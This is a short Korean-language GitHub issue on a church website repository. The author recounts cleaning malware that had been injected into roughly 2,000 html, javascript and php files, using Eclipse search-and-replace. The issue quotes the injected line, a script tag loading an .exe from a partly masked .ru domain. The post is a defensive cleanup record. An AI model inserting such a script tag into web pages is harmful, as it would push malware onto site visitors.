Taebu / ezrachurch

서울에스라교회 홈페이지 소스입니다.
http://ezrachurch.kr/wp
1 stars 0 forks source link

버그 있었던 문제 #7

Closed Taebu closed 4 years ago

Taebu commented 7 years ago

eclipse 에서

<script src="http://???.ru/ru.exe">
</script>

형태로 숨어있는 말웨어가 존재 했었다. 그래서 하나씩 하나씩 처리하다가 도저히 모두 지울 엄두가 나질 않아서 eclipse로 web contents 형태로 데이터를 이관 시킨후

형태로 찾아서 모두 갱신 시켰다. link 형식으로 해서 중복되는 코드로 작성 하질 않았다. 약 2천여개의 html, javascript, php 파일에 shellscript로 실행 한듯한 악성코드가 실행되도록 설계되어 있었다. 아마도 ftp 를 통하거나 업로드를 통해 실행이 가능하도록 문제가 심각했기 때문에 다시 설치할 까도 생각 했는데 return에 대한 코드를 \n 의 형태로나 \n 형태로 찾아내려는등 바보스러운 짓을 많이 하다가 찾아냈다.

삽질이 늘어갈수록 삽질을 조금 할수 있게 되는것 뿐 삽질을 아니할 수 없다.

오늘도 삽질 중이다.